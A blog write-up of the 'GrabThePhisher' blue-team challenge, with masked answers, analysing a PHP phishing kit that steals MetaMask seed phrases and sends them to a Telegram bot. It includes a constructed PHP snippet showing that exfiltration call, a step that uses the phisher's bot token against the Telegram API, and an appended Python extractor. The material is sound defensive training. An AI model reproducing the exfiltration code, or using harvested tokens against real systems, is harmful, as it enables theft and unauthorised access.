CyberDefenders: GrabThePhisher

This Blue Team challenge was released on 7/23/2022 from CyberDefenders. You can access the room at https://cyberdefenders.org/blueteam-ctf-challenges/95.

This is one of the easiest challenges I’ve ever encountered from CyberDefenders.org. It is a perfect challenge for beginners who just want to get their feet wet with hacking/IR challenges. The only skills and tools needed are reading the code used by the phishing actor in any text editor/viewer and a little research on how Telegram bots work.

I hope you will find my write-up helpful.

First, download the challenge file and unzip it:

  • Which wallet was used for asking the seed phrase?
    • m*******
  1. Browse to c75-GrabThePhisher > pankewk > metamask
  2. Open the file metamask.php with your choice of text editor/viewer
  • What is the file name that has the code for the phishing kit?
    • m*******.***
  • In which language was the kit written?
    • p**
  • What service does the kit use to retrieve the victim’s machine information?
    • s**** ***
  • How many seed phrases were already collected?
    • *
  1. Browse to c75-GrabThePhisher > pankewk > log
  2. Open log.txt
  • Write down the seed phrase of the most recent phishing incident.
    • f***** **** ******* ****** ******* ******* ******** ******* ***** **** ****** ******
  • Which medium had been used for credential dumping?
    • t*******
  1. Look inside the file metamask.php again
  • What is the token for the channel?
    • 5*********:***********************************
  • What is the chat ID of the phisher’s channel?
    • 5*********
  • What is the alias of the phish kit developer?
    • j***********
  • What is the full name of the phish actor?
    • M***** ********
  1. To find the full name of the phish actor, we have to use the information we have on hand: the Telegram user ID, the bot token, and the URL found inside the file metamask.php
  2. Read about the Telegram bot API from the page, https://core.telegram.org/bots/api#getchatmember
  3. We will have to utilize the sendMessage method in Telegram, passing the chat ID and sending a random message through the text parameter.
  4. Enter the following in the URL bar (replace the placeholders with the token and user ID from the kit): https://api.telegram.org/bot<enter_token_here>/sendMessage?chat_id=<enter_userID_here>&text=Hello_World
  • What is the username of the phish actor?
    • p**********
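As an added example (not from the write-up or the challenge files), here is a small Python helper that does the two mechanical parts of this triage: pulling the Telegram exfiltration settings out of a kit's PHP source and listing the seed phrases recorded in its log. The PHP snippet, log lines, token and chat ID below are constructed placeholders, not the challenge values.

```python
import re

# Constructed placeholder token in Telegram's "<bot id>:<35-char secret>" shape.
FAKE_TOKEN = "1234567890:" + "A" * 35

# Constructed sample of a kit's exfiltration code, modelled on the pattern the
# write-up describes (a PHP kit posting stolen seed phrases to a Telegram bot).
SAMPLE_PHP = f'''<?php
$token = "{FAKE_TOKEN}";
$chat_id = "9876543210";
$url = "https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($text);
file_put_contents("log/log.txt", $seed . PHP_EOL, FILE_APPEND);
'''

# Constructed log.txt contents: one 12-word seed phrase per line, oldest first.
SAMPLE_LOG = """apple banana cherry dog eagle fox grape hat igloo jungle kite lemon
moon night ocean piano queen river snake tiger umbrella violin water xray
"""

TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{35})\b")
CHAT_ID_RE = re.compile(r"chat_?id\W+[\"']?(-?\d{6,})", re.IGNORECASE)


def extract_exfil_config(php_source: str) -> dict:
    """Return the bot token and chat ID the kit exfiltrates to, plus the
    read-only getMe endpoint an analyst can use to identify the bot."""
    token = TOKEN_RE.search(php_source)
    chat = CHAT_ID_RE.search(php_source)
    if not token or not chat:
        return {}
    return {
        "token": token.group(1),
        "chat_id": chat.group(1),
        "bot_info_url": f"https://api.telegram.org/bot{token.group(1)}/getMe",
    }


def seed_phrases(log_text: str) -> list[str]:
    """Return log lines that look like BIP-39 seed phrases (12 or 24 lowercase words),
    in file order, so the last element is the most recent incident."""
    found = []
    for line in log_text.splitlines():
        words = line.strip().split()
        if len(words) in (12, 24) and all(w.isalpha() and w.islower() for w in words):
            found.append(" ".join(words))
    return found


if __name__ == "__main__":
    print(extract_exfil_config(SAMPLE_PHP))
    print(len(seed_phrases(SAMPLE_LOG)), "seed phrases; latest:", seed_phrases(SAMPLE_LOG)[-1])
```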

Thank you for checking my write-up. Please subscribe if you haven’t.

Published by lightkunyagami

https://tryhackme.com/badge/18276
